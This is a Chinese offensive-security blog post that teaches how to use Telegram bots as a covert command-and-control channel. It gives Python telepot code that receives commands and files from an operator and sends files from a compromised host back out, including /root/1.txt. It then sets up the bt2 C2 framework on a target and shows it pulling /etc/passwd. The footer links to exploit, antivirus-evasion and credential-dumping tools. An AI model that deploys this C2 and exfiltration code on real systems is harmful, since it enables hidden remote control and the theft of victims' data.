首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

命令控制之Telegram

文摘   其他   2024-11-22 07:00   四川  

文章前言

使用涉交网络作为C2 Server有两个好处,一方面是因为社交网络的服务器稳定,另一个方面是因为在于其通信的数据可以隐藏在正常的流量中,不容易被发现,本节主要是"站在巨人的肩膀"上来介绍通过Telegram的Bots功能结合Python来对API的调用来实现C2。

基础内容

Telegram是一款跨平台的实时通讯应用,目前支持Android、iPhone/iPad、WP、Web、PC/Mac/Linux,在整个通信过程中通信数据加密,官方曾悬赏$300,000 for Cracking Telegram Encryption,而且Telegram支持发送所有文件类型,Telegram提供对外开放的api,用户可定制性的开发客户端。

Telegram的Bots是Tegegram内置的第三方应用,通信方式为HTTPS,功能类似于聊天机器人,它可以获取定制化的信息,结合其他的服务使用,同时可以创建自定义的工具。

自我构建

搭建C2 Server

首先,登录Tegegram

之后访问https://telegram.me/botfather,添加BotFather为联系人(BotFather用来创建和管理自定义bot)

之后按照提示创建自定义bot,之后输入/newbot,根据流程依次为设定name、Username、Token信息:

之后成功创建Token:

12724xxxx059:AAEINExxxxxxxxxxxxxxxxxxx_hIl8A
Bot API 示例
安装依赖

目前Telegram官网已经公开了如下语言的开发实例:

https://core.telegram.org/bots/samples

下面我们选择Python作为测试,首先,安装需要的依赖:

pip install telepotpip install requests

环境测试

首先,我们需要测试一下账号是否可以正常使用:

import telepotbot = telepot.Bot('12xxxxx059:AAEINExxxxxxxxxxu_hIl8A')bot.getMe()

接受消息

成功返回username相关的信息,下面我们再来测试一下是否可以正常接收消息,在Telegram控制端向c2_test发送消息:

之后在终端使用python执行如下代码接收消息:

import telepotfrom pprint import pprintbot = telepot.Bot('12xxxxxx9:AAEINxxxxxxxxxxWKJolu_hxxx8A')response = bot.getUpdates()pprint(response)

循环接受消息

下面我们再来测试一下循环接收消息,测试代码如下:

import sysimport timeimport pprintimport telepotbot = telepot.Bot('1272xxxxxxxxxxVCQRSWKJolu_hIl8A')print ('Listening ...')def handle(msg):    pprint.pprint(msg)def main():     try:        bot.message_loop(handle)    except Exception as err:        print err    while True:        time.sleep(10)if __name__ == '__main__':    main()

运行如图,成功接收Server端发送的多条文字消息

之后发送消息如下:

之后

提取文字消息

使用glance()可以从接收的消息中提取一个元组(content_type,chat_type,chat_id),当下:

  • content_type包括text, audio, document, photo, sticker, video, voice,contact, location, venue, new_chat_member, left_chat_member, etc.

  • chat_type 包括private, group, or channel.

我们可以使用glance()把接收的文字消息提取出来,代码如下:

import sysimport timeimport pprintimport telepotbot = telepot.Bot('1272xxxxxxxxxxxxxxxxxxJolu_hIl8A')print ('Listening ...')def handle(msg):    content_type, chat_type, chat_id = telepot.glance(msg)    
    if content_type == 'text':        received_command = msg['text']        print (received_command)            else:        print (content_type, chat_type, chat_id)        returndef main():      try:        bot.message_loop(handle)    except Exception as err:        print err    while True:        time.sleep(10)
if __name__ == '__main__':    main()

之后在Telegram中进行交互信息如下所示:

命令执行效果如下所示,可以看到成功提取出Server端发来的文本消息:

实现接收文件

用于接收Server端发送的文件,并保存在当前目录:

import sysimport timeimport pprintimport telepotbot = telepot.Bot('1272xxxxxxxxxxxxxxxxxxxxolu_hIl8A')print ('Listening ...')def handle(msg):    content_type, chat_type, chat_id = telepot.glance(msg)    
    if content_type == 'text':        received_command = msg['text']        print (received_command)        elif content_type == 'document':        file_id = msg['document']['file_id']        filename = msg['document']['file_name']        bot.download_file(file_id, filename)        print "[+] Download File Success!"    else:        print (content_type, chat_type, chat_id)        returndef main():      try:        bot.message_loop(handle)    except Exception as err:        print err    while True:        time.sleep(10)
if __name__ == '__main__':    main()

发送文件:

成功接收文件:

实现发送消息

向Server端发送一条消息,代码如下:

import telepotfrom pprint import pprintbot = telepot.Bot('1272xxxxxxxxxxxxxxxu_hIl8A')bot.sendMessage('13xxxxx87', 'Hello C2 Server')

执行代码:

之后在服务端成功接收到代码:

实现发送文件

具体代码如下所示:

import telepotfrom pprint import pprintbot = telepot.Bot('1272413059:AAEINERxVSib-QTLhMVCQRSWKJolu_hIl8A')f = open('/root/1.txt', 'rb')  bot.sendDocument('130xxxxx87', f)

在终端执行命令:

成功实现发送文件:

以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能,剩下只需要将功能拼接,添加命令解析,就可以实现一个简易的C2 Server POC

bt2框架

项目介绍

Bt2是一个使用python编写开发的C2框架,它使用了telegram提供的基础设施和功能丰富的bot api,稍微改变了其通信平台的用途,使其可以充当c&c。

环境配置
pip install telepotpip install requestsgit clone https://github.com/blazeinfosec/bt2.git

之后编辑bt2.py文件,修改以下参数:

  • API_TOKEN:token

  • BOTMASTER_ID:自己帐号的chat_id

工具使用

在目标主机上执行bt2.py,之后可以看到client上线:

之后可以看到向我们发送了操作帮助:

命令执行

下载文件

/download /etc/passwd

参考链接

https://github.com/blazeinfosec/bt2

https://core.telegram.org/bots/samples

http://drops.xmd5.com/static/drops/tips-16142.html

https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/


·推 荐 阅 读·

最新后渗透免杀工具

【护网必备】高危漏洞综合利用工具

   【护网必备】Shiro反序列化漏洞综合利用工具增强版

【护网必备】外网打点必备-WeblogicTool

护网必备】最新Struts2全版本漏洞检测工具

Nacos漏洞综合利用工具

重点OA系统漏洞利用综合工具箱  

【护网必备】海康威视RCE批量检测利用工具

【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具


 http://mp.weixin.qq.com/s?__biz=Mzg4MTU4NTc2Nw==&mid=2247493600&idx=1&sn=194be60f69ca6653cf5c24b5c6db04dc
七芒星实验室
未知攻,焉知防,以攻促防,共筑安全!
 最新文章
命令控制之Octopus
内网渗透之ADCS权限维持
云存储攻防之COS存储桶
【神兵利器】OSS存储桶遍历利用
命令控制之DropBox
后渗透阶段权限维持方法-Monitors
命令控制之Telegram
【漏洞扫描】Spring框架的漏洞扫描​
横向移动之RDP&Desktop Session Hijack
内网渗透之内网权限维持
PyYAML反序列化深入刨析
Kubelet端口未授权访问利用
K8s Rootkit集群控制
甲方安全之第三方组件问题概览
【神兵利器】MSMAP内存马生成工具
K8s Rootkit集群控制
【神兵利器】grs内网穿透工具
K8s Dashboard Config利用攻击面
JAVA安全之FreeMark沙箱绕过研究
K8s污点横向渗透
JAVA安全之FreeMark模板注入刨析
【K8s安全】集群信息收集一篇通
JAVA安全之Thymeleaf模板注入检测再探
JumpServer堡垒机漏洞利用工具集
WebSocket攻防对抗概览
JRMP通信攻击过程及利用介绍
JAVA安全之Thymeleaf模板注入防护绕过
【免杀对抗】基于PE Patch技术的后渗透免杀工具
JAVA安全之Velocity模板注入刨析
使用bladeRF进行GPS欺骗
RDP连接多开方法与利用思路
【漏洞扫描】Spring框架的漏洞扫描​
Adobe Flash Player社工钓鱼
【蓝队福利】D-eyes木马查杀与微步的一次巧妙结合
【免杀工具】手动/自动patch shellcode到二进制文件的免杀工具
Windows凭证钓鱼方式面面观
WordPress检测工具使用指南
内网渗透之内网权限维持
【护网必备】JumpServer堡垒机利用工具集
【免杀对抗】无可执行权限加载ShellCode
WMIHACKER:免杀横向移动命令执行测试工具
【免杀对抗】基于PE Patch技术的后渗透免杀工具
内网渗透之从域用户到企业管理源用户
【最新免杀手法】针对PE文件的分离免杀对抗工具
从网络配置文件中提取PEAP凭据
程序源码保护攻防对抗录
OA-EXPTOOL漏洞综合利用框架
记URL重定向漏洞骚技巧
Swagger接口安全测试评估
基于Windows权限维持总结
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉